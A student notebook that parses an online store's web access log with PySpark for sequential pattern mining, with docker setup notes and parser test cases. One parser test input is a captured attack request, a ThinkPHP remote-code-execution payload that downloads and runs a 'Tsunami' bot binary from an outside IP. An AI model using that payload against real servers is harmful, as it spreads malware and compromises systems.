# Project: Sequential Pattern Mining with Web log

In this project we will use spark and the prefix algorithm to mine a web log from an online store.


Author: <font color="blue">Ian Liu</font>

E-mail: <font color="blue">Liuusa.tw@gmail.com</font>

Date: <font color="blue">April 10, 2023</font>

In [None]:
from pyspark.sql.functions import col
from pyspark.mllib.fpm import FPGrowth
from pyspark import SparkContext
import re
from datetime import datetime
from pyspark.sql import SparkSession
import pyspark.sql.functions as F
from pyspark.ml.fpm import PrefixSpan

## About Data and Cleaning

**Dataset**: https://dataverse.harvard.edu/dataset.xhtml?persistentId=doi:10.7910/DVN/3QBYB5

- The above link serves as explaination of the dataset. You can download data from https://cis331.guihang.org/data/access.log.zip
- **Download and unzip** the file `Access.log.zip` ; Move the file `access.log` to the directory that you map into docker instance:

Say, I move my file into my home: `/Users/zhengqu` ; then in Mac terminal/Windows command prompt, I "cd" to my home dir (just type "cd" and enter, it will do).

```bash
pwd
```

<font size=-1 color=grey>/Users/zhengqu</font>

Let's assume I put `access.log` in my home dir as `/Users/zhengqu/access.log` and my spark docker container/instance was created by the following command, as I demonstrated in the video after the spark lab lecture:

```bash
docker run -p 10000:8888 -d -P --name notebook -it  -v "$PWD:/home/jovyan/mydir" jupyter/all-spark-notebook
```

whereby `"$PWD"` is actually `/Users/zhengqu` in my case, and it is mapped into docker container `notebook` as `/home/jovyan/mydir`. So anything I put in this folder `"/Users/zhengqu"` on my host laptop is available in my spark docker container `notebook` in this folder: `/home/jovyan/mydir`.



### Access the data file from docker container

- First you start the spark docker contaner/instance (you don't have to if your docker container is not stopped since last running)

Use this command to show docker container running status:

```bash
docker ps -a
```

- To start /start container:

```bash
docker start notebook
```

- Next you connect your container with bash:

```bash
# connect to docker container with bash
docker exec -it notebook /bin/bash
```

- Now you are inside the spark docker container (imagine it as a virtual linux machine).

----
**Note: commands below are run from docker container linux system**


- Let's "cd" to the mapped folder:

```bash
# change to mapped dir:
cd /home/jovyan/mydir
```


- Let's check the file by running:

```bash
 ls -l access.log
```
<font size=-2 color=grey>`-rw-r--r--@ 1 jovyan  staff 3502440823 Jan 26  2019 access.log`</font>

- Let's check how many lines it has by running (this takes a while):

```bash
wc -l access.log
```
<font size=-2 color=grey>`10365152 access.log`</font>

- Let's print the last 100 lines from end of the file:

```bash
tail -n 100 access.log
```



<font size=-2 color=#524d43>

```
151.239.2.90 - - [26/Jan/2019:20:29:09 +0330] "GET /static/bundle-bundle_site_head.css HTTP/1.1" 499 0 "https://www.zanbil.ir/search/%D8%B3%D8%B1%D8%B1%D8%B3%DB%8C%D8%AF/p0" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0" "-"
151.239.2.90 - - [26/Jan/2019:20:29:09 +0330] "GET /image/%7B%7BbasketItem.id%7D%7D?type=productModel&wh=50x50 HTTP/1.1" 200 5 "https://www.zanbil.ir/search/%D8%B3%D8%B1%D8%B1%D8%B3%DB%8C%D8%AF/p0" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0" "-"
5.114.175.169 - - [26/Jan/2019:20:29:09 +0330] "GET /image/56602/productModel/200x200 HTTP/1.1" 200 6188 "https://www.zanbil.ir/m/filter/b2%2Cp65%2Ct31" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" "-"
5.114.175.169 - - [26/Jan/2019:20:29:09 +0330] "GET /image/62175/productModel/200x200 HTTP/1.1" 200 8140 "https://www.zanbil.ir/m/filter/b2%2Cp65%2Ct31" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" "-"
5.114.175.169 - - [26/Jan/2019:20:29:09 +0330] "GET /image/62064/productModel/200x200 HTTP/1.1" 200 6840 "https://www.zanbil.ir/m/filter/b2%2Cp65%2Ct31" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" "-"
151.239.2.90 - - [26/Jan/2019:20:29:09 +0330] "GET /static/images/search-category-arrow.png HTTP/1.1" 200 217 "https://znbl.ir/static/bundle-bundle_site_head.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0" "-"
[truncated]
```
</font>

---

## Understand the Web Log Format

You want to read [this article](https://www.sumologic.com/blog/apache-access-log/) to understand the web log format. Each web site may have a slightly different format. In general, you will see a user IP at the beginning, then the timestamp (in `[ ]` in above case) and user request (in simplified terms, sending data is called `POST`, like send login password; retrieving data is called `GET`). The request URL doesn't contain the base domain name. So

```
GET /image/62175/productModel/200x200
```

means retrieving https://www.zanbil.ir/image/62175/productModel/200x200
(the base domain name of this web log is www.zanbil.ir)

The 3 digits number after `HTTP/1.1` is the access status: 200 means success, 3** means success but user previously requested the same data so it might be served from browser cache (saved data in user browser), 4** means client (user browser) error (404 is the infamous non-existing status); 5** means server error. <font color="orange">So you only care about 200 and 3** status, and want to filter out lines with other status types.</font>

You will see each IP at one timestamp requesting data from many URLs simultaneously--that's because when you click a page, multiple images, css, javascript files within that page will be retrieved and each leaves a separate web log entry.


<font color="orange">You want to remember before mining further you will filter out all lines containing requesting css or js (you want to manually figure out patterns for these types of urls) which are normally useless for our purpose.</font>

You will also notice some log entry contain this type of lines:

<font size=-2 color=#888>
```
37.129.59.160 - - [26/Jan/2019:20:29:12 +0330] "GET /basket/add/62424?mobile=1&addedValues= HTTP/1.1" 302 0 "https://www-zanbil-ir.cdn.ampproject.org/v/s/www.zanbil.ir/m/product/32148/%DA%AF%D9%88%D8%B4%DB%8C-%D8%AA%D9%84%D9%81%D9%86-%D8%A8%DB%8C-%D8%B3%DB%8C%D9%85-%D9%BE%D8%A7%D9%86%D8%A7%D8%B3%D9%88%D9%86%DB%8C%DA%A9-%D9%85%D8%AF%D9%84-Panasonic-Cordless-Telephone-KX-TGC412?amp_js_v=0.1&usqp=mq331AQECAEoAQ%3D%3D" "Mozilla/5.0 (Linux; Android 6.0.1; D6633 Build/23.5.A.1.291) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36" "-"
```
</font>

- Note: <font color="orange">this URL `/basket/add/62424` means the user's action to add a product to the basket!</font>


In [None]:
!ls -l access.log

-rwxrwxrwx 1 jovyan 1000 3502440823 Mar 27 19:11 access.log


In [None]:
!wc -l access.log

10365152 access.log


In [None]:
!tail -n 50 access.log

5.213.7.50 - - [26/Jan/2019:20:29:11 +0330] "GET /product/18962/%D8%BA%D8%B0%D8%A7-%D8%B3%D8%A7%D8%B2-%D9%85%D9%88%D9%84%DB%8C%D9%86%DA%A9%D8%B3-%D9%85%D8%AF%D9%84-FP7367RT HTTP/1.1" 302 0 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1" "-"
180.94.84.225 - - [26/Jan/2019:20:29:11 +0330] "GET /amp-helper-frame.html?appId=a624a1c1-0c93-466a-a546-e146710f97e6&parentOrigin=https://www.zanbil.ir HTTP/1.1" 200 133 "https://www.zanbil.ir/m/article/616/%D8%B9%D9%84%D8%AA-%D8%AE%D9%88%D8%A7%D8%A8-%D8%B1%D9%81%D8%AA%D9%86%D8%8C%DA%AF%D8%B2%DA%AF%D8%B2%D8%8C%D8%A8%DB%8C-%D8%AD%D8%B3%DB%8C-%D9%88-%D9%85%D9%88%D8%B1-%D9%85%D9%88%D8%B1-%D8%B4%D8%AF%D9%86-%D8%A7%D9%86%DA%AF%D8%B4%D8%AA%D8%A7%D9%86-%D8%AF%D8%B3%D8%AA-%D9%88-%D8%AF%D8%B1%D9%85%D8%A7%D9%86-%D8%A2%D9%86" "Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-J330F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/7

---

### Preprocess Tasks

To simplify our task, we will only consider users who have added at least a product to the basket. So preprocess steps involve:

0. read the access.log into spark`*`
1. filter out all unnecessary lines as highlighted in orange before.
2. Get a list of IPs (let's call it uniqueIPs) who performed the action of adding product(s) to the basket
3. filter out all records whose IP does not belong to the IP list in step 2.

The remaining records are what we will mine with prefixspan.

`*` For step 0, for reading text file into spark, follow examples on this page (click python version): https://spark.apache.org/docs/latest/mllib-frequent-pattern-mining.html


### Example on a notebook running from docker container

- Run this from docker container's Linux bash command line to show jupyter notebook tokens

```
jupyter notebook list
```

<font size=-2 color=grey>

```
Currently running servers:
http://0.0.0.0:8888/?token=01e38a2234531e653d320df569dbc94173ebe89460cd57a :: /home/jovyan
```
</font>


In your laptop browser you open this url:
`http://127.0.0.1:10000/?token=01e38a2234531e653d320df569dbc94173ebe89460cd57a`

Note you replace 8888 with 10000 , then you navigate to your mapped dir which is `mydir` if you follow above commands. Then you do "file" and new notebook, save the new notebook (file>save notebook). You will also see the new notebook in your laptop folder, in my case it's in `/Users/zhengqu` -- this notebook is running in docker container, so do not simultaneously open the same notebook in host laptop (Windows/MAC)'s jupyter! This creates conflict.

#### Let's see pyspark example from https://spark.apache.org/docs/latest/mllib-frequent-pattern-mining.html


```python
from pyspark.mllib.fpm import FPGrowth
from pyspark import SparkContext
sc = SparkContext('local[*]')

# Note data is an object of RDD: pyspark.rdd.PipelinedRDD
data = sc.textFile("data/mllib/sample_fpgrowth.txt")
transactions = data.map(lambda line: line.strip().split(' '))
model = FPGrowth.train(transactions, minSupport=0.2, numPartitions=10)
result = model.freqItemsets().collect() ## << note .collect()
for fi in result:
    print(fi)
```

Please run this example. Note
- you need to download `sample_fpgrowth.txt` from
https://github.com/apache/spark/raw/master/data/mllib/sample_fpgrowth.txt
and properly specify the file path in `sc.textFile()`. You can use `!wget URL-to-data` in jupyter notebook, then `!ls path/to/downloaded/file` to verify the file
- The spark object collection (data frame or pipelines) cannot be iterated until be applied with `.collect()` as in above example or using  `.take(n)` as in demo in class.

## <font color=red>You code to run example of sample_fpgrowth.txt with FPGrowth here </font>

In [None]:
!wget https://github.com/apache/spark/raw/master/data/mllib/sample_fpgrowth.txt

--2023-03-30 19:20:25--  https://github.com/apache/spark/raw/master/data/mllib/sample_fpgrowth.txt
Resolving github.com (github.com)... 140.82.114.3, ::ffff:140.82.114.3
Connecting to github.com (github.com)|140.82.114.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/apache/spark/master/data/mllib/sample_fpgrowth.txt [following]
--2023-03-30 19:20:26--  https://raw.githubusercontent.com/apache/spark/master/data/mllib/sample_fpgrowth.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 68 [text/plain]
Saving to: ‘sample_fpgrowth.txt’


2023-03-30 19:20:26 (1.17 MB/s) - ‘sample_fpgrowth.txt’ saved [68/68]



In [None]:
from pyspark.mllib.fpm import FPGrowth
from pyspark import SparkContext

sc = SparkContext('local[*]')
# sc.stop()

# Note data is an object of RDD: pyspark.rdd.PipelinedRDD
data = sc.textFile("sample_fpgrowth.txt")
transactions = data.map(lambda line: line.strip().split(' '))
model = FPGrowth.train(transactions, minSupport=0.2, numPartitions=10)
result = model.freqItemsets().collect() ## << note .collect()
for fi in result:
    print(fi)

Note:

- data is an object of RDD:
```python
type(data)
```
> <font size=-2>pyspark.rdd.PipelinedRDD</font>
- `sc.textFile()` takes the path to your input file. Use jupyter command `!ls path/to/access.log` to verify your file path. Or switch to docker container command line, using something like `ls /home/jovyan/mydir/access.log` to verify.
- `data.map()` takes a function to be applied to each line in the input text file. If you prefer not using lambda function, you can define a named function like:
```python
def myParser (line):
   return line.strip().split(' ')
```

And then you can use `data.map` like:
```python
transactions = data.map(myParser)
```

Please try it in the example. Also reference notebook "pyspark-ex.ipynb" used in my video demo for docker/spark.


## <font color=red>You code to run example of sample_fpgrowth.txt with myParser here </font>

In [None]:
sc.stop()
sc = SparkContext('local[*]')


# Note data is an object of RDD: pyspark.rdd.PipelinedRDD
data = sc.textFile("sample_fpgrowth.txt")

def myParser (line):
   return line.strip().split(' ')

transactions = data.map(myParser)
model = FPGrowth.train(transactions, minSupport=0.2, numPartitions=10)
result = model.freqItemsets().collect() ## << note .collect()
for fi in result:
    print(fi)

FreqItemset(items=['z'], freq=5)
FreqItemset(items=['x'], freq=4)
FreqItemset(items=['x', 'z'], freq=3)
FreqItemset(items=['y'], freq=3)
FreqItemset(items=['y', 'x'], freq=3)
FreqItemset(items=['y', 'x', 'z'], freq=3)
FreqItemset(items=['y', 'z'], freq=3)
FreqItemset(items=['r'], freq=3)
FreqItemset(items=['r', 'x'], freq=2)
FreqItemset(items=['r', 'z'], freq=2)
FreqItemset(items=['s'], freq=3)
FreqItemset(items=['s', 'y'], freq=2)
FreqItemset(items=['s', 'y', 'x'], freq=2)
FreqItemset(items=['s', 'y', 'x', 'z'], freq=2)
FreqItemset(items=['s', 'y', 'z'], freq=2)
FreqItemset(items=['s', 'x'], freq=3)
FreqItemset(items=['s', 'x', 'z'], freq=2)
FreqItemset(items=['s', 'z'], freq=2)
FreqItemset(items=['t'], freq=3)
FreqItemset(items=['t', 'y'], freq=3)
FreqItemset(items=['t', 'y', 'x'], freq=3)
FreqItemset(items=['t', 'y', 'x', 'z'], freq=3)
FreqItemset(items=['t', 'y', 'z'], freq=3)
FreqItemset(items=['t', 's'], freq=2)
FreqItemset(items=['t', 's', 'y'], freq=2)
FreqItemset(items=['t', '

## Read and parse data in spark

In this project, your function, let's still call it `myParser` for `data.map()` should take a line of string and  return a tuple of

`IP, TIMESTAMP, REQUEST_URL, STATUS`

- `IP` can be a string,
- `TIMESTAMP` should be a datetime object, refer to [this tutorial](https://stackabuse.com/converting-strings-to-datetime-in-python/) for converting string to datetime object. (note: timezone doesn't matter in this project because all records are in the same timezone, which is server time, so you can ignore it.)
- `REQUEST_URL` is a string
- STATUS is integer, 200, 302 etc.


It's a good habit to test your function `myParser` first, with a smaller dataset and without spark, before proceeding. You can create a 20 line file for this by running this in docker container Linux command line:
```bash
tail -n 20 access.log > small20.log
```

This will create a file "small20.log"

You can view it by running following command in docker container Linux command:
```bash
cat small20.log
```

Now you can test this file (note it's sitting inside `"/home/jovyan/mydir"` ) by following python code in Jupyter notebook:

```python
# Note this test doesn't involve spark
lines = open("/home/jovyan/mydir/small20.log").readlines()
for l in map(myParser, lines):
   print(l)
```




## <font color=red>You code for defining function `myParser` and testing it on small20.log without using spark (you can use code above) here </font>

In [None]:
import re
from datetime import datetime
def myParser(line: str) -> tuple:
    """
    Take a line of string and return a tuple of (IP, TIMESTAMP, REQUEST_URL, STATUS)
    """
    #General Filter
    reg = r'\d+\.\d+\.\d+\.\d+[\s]+-[\s]+-[\s]+[\[][\s\S]+\+\d\d\d\d[\]][\s]+"[\s]*(GET|POST|HEAD|DELETE|PUT|CONNECT|OPTIONS|TRACE|PATCH)[\s]+.*[\s]*(HTTP)\/\d+\.\d+.*"\s+\d\d\d\s'
    reg_search = re.search(reg,line)
    if reg_search is not None:
        line = reg_search.group()
    else:
        #Some of the elements such as the request method may be missing
        line_list = line.split('"')
        if len(line_list) >= 3:
            line = line_list[0] + '"' + line_list[1] + '"' + line_list[2]

    #Find IP
    reg = r'\d+\.\d+\.\d+\.\d+[\s]-[\s]-[\s]\['
    reg_search = re.search(reg,line)
    if reg_search is not None:
        new_line = reg_search.group()
    else:
        print('ip', reg, line)
        new_line = line
    reg = r'[\s]-[\s]-[\s]'
    reg_search = re.search(reg,new_line)
    if reg_search is not None:
        ip_breaking_index = reg_search.start()
        ip = new_line[:ip_breaking_index]
    else:
        print(reg, new_line)
        if '- -' in new_line: ip = new_line.split('- -')[0].strip()
        else: ip = new_line.strip().split()[0]

    reg_search = re.search('(' + r"\.".join(ip.split('.'))+ ')', line)
    if reg_search is not None:
        timestamp = line[reg_search.end():]
    else:
        print('(' + r"\.".join(ip.split('.'))+ ')', line)
        if '- -' in line: timestamp = line.split('- -')[1].strip()
        else:
            temp_list = line.split()
            temp_list.pop(0)
            timestamp = " ".join(temp_list)

    if re.search(r'(GET|POST|HEAD|DELETE|PUT|CONNECT|OPTIONS|TRACE|PATCH)',timestamp) is not None:
        reg = r'[\[][\s\S]+\+\d\d\d\d[\]][\s]+"[\s]*(GET|POST|HEAD|DELETE|PUT|CONNECT|OPTIONS|TRACE|PATCH)'
    else:
        reg = r'[\[][\s\S]+\+\d\d\d\d[\]][\s]+"[\s]*'
    reg_search = re.search(reg,timestamp)
    if reg_search is None:
        print('timestamp',reg, timestamp)
        timestamp = timestamp
    else:
        timestamp = reg_search.group()

    reg = r'[\[][\s\S]+\+\d\d\d\d[\]][\s]+"[\s]*'
    reg_search = re.search(reg,timestamp)
    if reg_search is None:
        print('timestamp', reg, timestamp)
        timestamp = ""
    else:
        timestamp = reg_search.group()

    if timestamp is None: print("Couldn't find timestamp")
    else: timestamp = timestamp[:-1].strip()[1:-1]
    if '+' in timestamp:
        timestamp = timestamp.split('+')[0].strip()
    else: timestamp = timestamp.strip()

    timestamp = datetime.strptime(timestamp, "%d/%b/%Y:%H:%M:%S")

    if reg_search is None: print('timestamp',reg, line)
    else: reg_search = re.search(reg,line)
    request_url_index = reg_search.end()


    if re.search(r'(GET|POST|HEAD|DELETE|PUT|CONNECT|OPTIONS|TRACE|PATCH)',line) is not None and 'HTTP' in line:
        reg = r'(GET|POST|HEAD|DELETE|PUT|CONNECT|OPTIONS|TRACE|PATCH)[\s]+.*[\s]+(HTTP)\/\d+\.\d+.*"'
        reg_search = re.search(reg,line[request_url_index:])
        if reg_search is None: print("url problem, line: ", line[request_url_index:])

        request_url = reg_search.group()
        status_code_index = re.search(reg,line).end()
        request_url = request_url.strip()
        reg = '(HTTP)\/\d+\.\d+.*"'
        reg_search = re.search(reg,request_url)
        if reg_search is None:
            print('remove HTTP/1.1', reg, request_url)
            request_url = request_url
        else:
            request_url = request_url[:reg_search.start()].strip() # Remove HTTP/1.1
            request_url = request_url.split()[-1] # Remove request method like POST and GET
    else:
        request_url = line[request_url_index:].split('"')[0]
        status_code_index = line.find(request_url)


    reg = r'\s+\d\d\d\s'
    status_code = line[status_code_index:]
    reg_search = re.search(reg, status_code)
    if reg_search is None:
        print('status_code', reg, status_code)
        print('line',line)
        status_code = 999
    else:
        status_code = reg_search.group()
        status_code = int(status_code.strip())


    return ip, timestamp, request_url, status_code

In [None]:
%store myParser

In [None]:
print(myParser(r'91.251.151.64 - - [26/Jan/2019:20:23:46 +0330] "GET /m/filter/b8%2Ct10%2Ct4 HTTP/1.1" 200 19669 "https://www.zanbil.ir/m/filter/b8%2Ct10" "Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-A520F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/7.4 Chrome/59.0.3071.125 Mobile Safari/537.36" "-'))
print(myParser(r'74.82.60.74 - - [22/Jan/2019:08:27:26 +0330] "\x13BitTorrent protocol\x00\x00\x00\x00\x00\x18\x00\x05\x7FI\xE3\x1Ao\xC6\x13\x9D\xCE\xBB2\xBD(\x10w\xC8\x99\xC1\xC1\xCC-UW0I2M-QuIQ4GIjrmt2\x0F\x8A\x00\xAD\x96\x97\x96\xAB\x00\x22**\x13\x01\x13\x02\x13\x03\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x13\xC0\x14\x00\x9C\x00\x9D\x00/\x005\x00" 400 166 "-" "-" "-"'))
print(myParser(r'93.115.27.22 - - [22/Jan/2019:10:59:39 +0330] "CONNECT www.msftncsi.com:443 HTTP/1.1" 400 166'))
print(myParser(r'80.82.64.127 - - [22/Jan/2019:08:40:11 +0330] "\x16\x03\x01\x00\x96\x01\x00\x00\x92\x03\x03\xCB\x077\xE6\x83Nq>\xB5\xED\x9E\x87\xB7\x08\xD7\xEAF" 400 166'))
print(myParser(r'74.82.60.74 - - [22/Jan/2019:08:27:26 +0330] "\x13BitTorrent protocol\x00\x00\x00\x00\x00\x18\x00\x05\x7FI\xE3\x1Ao\xC6\x13\x9D\xCE\xBB2\xBD(\x10w\xC8\x99\xC1\xC1\xCC-UW0I2M-QuIQ4GIjrmt2\x0F\x8A\x00\xAD\x96\x97\x96\xAB\x00\x22**\x13\x01\x13\x02\x13\x03\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x13\xC0\x14\x00\x9C\x00\x9D\x00/\x005\x00" 400 166'))
print(myParser(r"""202.70.250.38 - - [24/Jan/2019:15:58:56 +0330] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1\x00" 400 166"""))
print(myParser(r'124.235.138.251 - admin [25/Jan/2019:21:28:21 +0330] "GET / HTTP/1.1" 301 178 '))

('91.251.151.64', datetime.datetime(2019, 1, 26, 20, 23, 46), '/m/filter/b8%2Ct10%2Ct4', 200)
('74.82.60.74', datetime.datetime(2019, 1, 22, 8, 27, 26), '\\x13BitTorrent protocol\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x05\\x7FI\\xE3\\x1Ao\\xC6\\x13\\x9D\\xCE\\xBB2\\xBD(\\x10w\\xC8\\x99\\xC1\\xC1\\xCC-UW0I2M-QuIQ4GIjrmt2\\x0F\\x8A\\x00\\xAD\\x96\\x97\\x96\\xAB\\x00\\x22**\\x13\\x01\\x13\\x02\\x13\\x03\\xC0+\\xC0/\\xC0,\\xC00\\xCC\\xA9\\xCC\\xA8\\xC0\\x13\\xC0\\x14\\x00\\x9C\\x00\\x9D\\x00/\\x005\\x00', 400)
('93.115.27.22', datetime.datetime(2019, 1, 22, 10, 59, 39), 'www.msftncsi.com:443', 400)
('80.82.64.127', datetime.datetime(2019, 1, 22, 8, 40, 11), '\\x16\\x03\\x01\\x00\\x96\\x01\\x00\\x00\\x92\\x03\\x03\\xCB\\x077\\xE6\\x83Nq>\\xB5\\xED\\x9E\\x87\\xB7\\x08\\xD7\\xEAF', 400)
('74.82.60.74', datetime.datetime(2019, 1, 22, 8, 27, 26), '\\x13BitTorrent protocol\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x05\\x7FI\\xE3\\x1Ao\\xC6\\x13\\x9D\\xCE\\xBB2\\xBD(\\x10w\\xC8\\x99\\xC1\\xC1\\xCC-UW0I2M-

In [None]:
!tail -n 20 access.log > small20.log
!tail -n 10000 access.log > med10000.log
!tail -n 50000 access.log > med50000.log
!head -n 100000 access.log > large100000.log
!head -n 1000000 access.log > large1000000.log

In [None]:
!cat small20.log

91.99.55.165 - - [26/Jan/2019:20:29:12 +0330] "GET /m/filter/p2597%2Cb231?page=1 HTTP/1.1" 200 18805 "https://www.zanbil.ir/m/filter/p2597%2Cb231" "Mozilla/5.0 (Linux; Android 8.0.0; SM-G930F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36" "-"
151.242.106.253 - - [26/Jan/2019:20:29:12 +0330] "GET /image/30181?name=fsr14-55.jpg&wh=max HTTP/1.1" 200 50162 "https://www.zanbil.ir/m/product/30181/59833/%DB%8C%D8%AE%DA%86%D8%A7%D9%84-%D9%81%D8%B1%DB%8C%D8%B2%D8%B1-%D8%B3%D8%A7%DB%8C%D8%AF-%D8%A8%D8%A7%DB%8C-%D8%B3%D8%A7%DB%8C%D8%AF-%D8%B3%D8%A7%D9%85%D8%B3%D9%88%D9%86%DA%AF-%D9%85%D8%AF%D9%84-FSR14-STS" "Mozilla/5.0 (Linux; Android 7.0; P008) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Safari/537.36" "-"
192.15.51.231 - - [26/Jan/2019:20:29:13 +0330] "GET /image/267/productModel/150x150 HTTP/1.1" 200 3423 "https://www.zanbil.ir/m/product/4125/205/%D8%B3%DB%8C%D9%86%DA%A9-%D8%B8%D8%B1%D9%81%D8%B4%D9%88%DB%8C%DB%8C-%D8%B1%D9%88%DA%A9%D8%A7%D8%B1

In [None]:
# Note this test doesn't involve spark
lines = open("/home/jovyan/mydir/small20.log").readlines()
for l in map(myParser, lines):
   print(l)

('91.99.55.165', datetime.datetime(2019, 1, 26, 20, 29, 12), '/m/filter/p2597%2Cb231?page=1', 200)
('151.242.106.253', datetime.datetime(2019, 1, 26, 20, 29, 12), '/image/30181?name=fsr14-55.jpg&wh=max', 200)
('192.15.51.231', datetime.datetime(2019, 1, 26, 20, 29, 13), '/image/267/productModel/150x150', 200)
('13.66.139.0', datetime.datetime(2019, 1, 26, 20, 29, 13), '/product/29746/%D9%85%D8%A7%D8%B4%DB%8C%D9%86-%D8%A7%D8%B5%D9%84%D8%A7%D8%AD-%D8%A8%D8%AF%D9%86-%D9%BE%D8%B1%D9%86%D8%B3%D9%84%DB%8C-%D9%85%D8%AF%D9%84-Princely-Body-Groomer-PR461AT', 200)
('45.79.177.249', datetime.datetime(2019, 1, 26, 20, 29, 13), '/m/browse/evaporative-air-cooler/%DA%A9%D9%88%D9%84%D8%B1-%D8%A2%D8%A8%DB%8C', 200)
('180.94.84.225', datetime.datetime(2019, 1, 26, 20, 29, 13), '/image/get?path=/Image/ofa4bc2n.jpg', 200)
('5.134.161.178', datetime.datetime(2019, 1, 26, 20, 29, 13), '/image/216/brand', 200)
('5.134.161.178', datetime.datetime(2019, 1, 26, 20, 29, 13), '/image/217/brand', 200)
('5.134.161.

# Note data is an object of RDD: pyspark.rdd.PipelinedRDD
After your test, apply your function `myParser` in spark RDD and print out 15 rows （use data.take(15) ）from your large spark data (based upon the large access.log file), note each row will be:

IP, TIMESTAMP, REQUEST_URL, STATUS


## <font color=red>You code to test `myParser` on reading access.log as spark RDD and print out 15 rows here </font>

In [None]:
sc.stop()
sc = SparkContext('local[*]')


# Note data is an object of RDD: pyspark.rdd.PipelinedRDD
data = sc.textFile("access.log")

transactions = data.map(myParser)
# model = FPGrowth.train(transactions, minSupport=0.2, numPartitions=10)
# result = model.freqItemsets().collect() ## << note .collect()
# for fi in result:
#     print(fi)
for i in transactions.take(15):
    print(i)

('54.36.149.41', datetime.datetime(2019, 1, 22, 3, 56, 14), '/filter/27|13%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,27|%DA%A9%D9%85%D8%AA%D8%B1%20%D8%A7%D8%B2%205%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,p53', 200)
('31.56.96.51', datetime.datetime(2019, 1, 22, 3, 56, 16), '/image/60844/productModel/200x200', 200)
('31.56.96.51', datetime.datetime(2019, 1, 22, 3, 56, 16), '/image/61474/productModel/200x200', 200)
('40.77.167.129', datetime.datetime(2019, 1, 22, 3, 56, 17), '/image/14925/productModel/100x100', 200)
('91.99.72.15', datetime.datetime(2019, 1, 22, 3, 56, 17), '/product/31893/62100/%D8%B3%D8%B4%D9%88%D8%A7%D8%B1-%D8%AE%D8%A7%D9%86%DA%AF%DB%8C-%D9%BE%D8%B1%D9%86%D8%B3%D9%84%DB%8C-%D9%85%D8%AF%D9%84-PR257AT', 200)
('40.77.167.129', datetime.datetime(2019, 1, 22, 3, 56, 17), '/image/23488/productModel/150x150', 200)
('40.77.167.129', datetime.datetime(2019, 1, 22, 3, 56, 18), '/image/45437/productModel/150x150', 200)
('40.77.167.129', datetime.datetime(2019

## Filtering the spark data

Now you want to filter your RDD. We completed step 0 below. The remaining steps are 1,2,3.

0. read the access.log into spark (**completed**)
1. filter out all unnecessary lines as highlighted before.
2. Get a list of IPs (let's call it uniqueIPs) who performed the action of adding product(s) to the basket
3. filter out all records whose IP does not belong to the IP list in step 2.

#### Converting RDD to dataframe

In order to do filtering operations, we want to convert the RDD into spark dataframe. Let's run and study following examples.

**Note**: in case you get error with `ValueError: Cannot run multiple SparkContexts at once` you need to stop previous `SparkContext` by running
```python
sc.stop()
```

Or you comment the line for `sc = SparkContext('local[*]')`

**Important** Run and **study** the code example below carefully, you might use every line of it, with modification, for the project.

```python
from pyspark.sql import SparkSession
from pyspark import SparkContext
import pyspark.sql.functions as F


sc = SparkContext('local[*]') # comment this in case you already have SparkContext running



dataList = [("James", "Cameron","Sales","NY",90000,34,10000),
    ("Michael", "Johnson","Sales","NY",86000,56,20000),
    ("Robert", "Stromberg","Sales","CA",81000,30,23000),
    ("Maria", "McDonald","Finance","CA",90000,24,23000),
    ("Raman","Pearson","Finance","CA",99000,40,24000),
    ("Scott","Kindel","Finance","NY",83000,36,19000),
    ("Jen","Lewis","Finance","NY",79000,53,15000),
    ("Jeff", "Scott","Marketing","CA",80000,25,18000),
    ("Kumar", "Jobs","Marketing","NY",91000,50,21000)
  ]
rdd=sc.parallelize(dataList) # Note RDD is created from list, similar to creating it from a text file

# *** Now we convert rdd to dataframe
spark = SparkSession(sc) # this is necessary for rdd to be converted to data frame

# converting RDD to DataFrame
df = rdd.toDF(schema = ["first_name", "last_name","department","state","salary","age","bonus"])

# Show schema
df.printSchema()

# Show data frame
df.show(truncate=False)

# Note we create two new columns from grouped data:
# they are renamed as dep_salary, dep_individual_salary
df.groupBy("department").agg(F.sum('salary').alias("dep_salary"),
          F.collect_list('salary').alias("dep_individual_salary")).show()
```


